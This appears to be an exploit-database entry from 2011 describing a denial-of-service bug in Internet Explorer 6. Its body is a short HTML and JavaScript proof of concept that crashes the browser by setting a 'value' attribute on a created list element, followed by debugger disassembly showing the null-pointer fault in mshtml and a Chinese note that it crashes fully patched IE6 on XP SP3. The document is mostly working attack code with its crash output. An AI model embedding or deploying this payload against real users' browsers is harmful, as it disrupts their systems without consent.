Internet Explorer6 空指针访问 DOS 漏洞



EKU-ID: 536 CVE: OSVDB-ID:
Author: 灰帽 Published: 2011-06-15 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


<html>
<body >
<script>

com = document.createElement(‘li’);

com.setAttribute(‘value’, ‘huimaozi’);
 
</script>
</body>
</html>

mshtml!CMarkup::FindMyListContainer:
7e41ea7f 8bff            mov     edi,edi
7e41ea81 55              push    ebp
7e41ea82 8bec            mov     ebp,esp
7e41ea84 56              push    esi
7e41ea85 8b7508          mov     esi,dword ptr [ebp+8]
7e41ea88 8b0e            mov     ecx,dword ptr [esi]  ds:0023:00000000=????????

以上代码在XP SP3 ie6 全补丁下崩溃.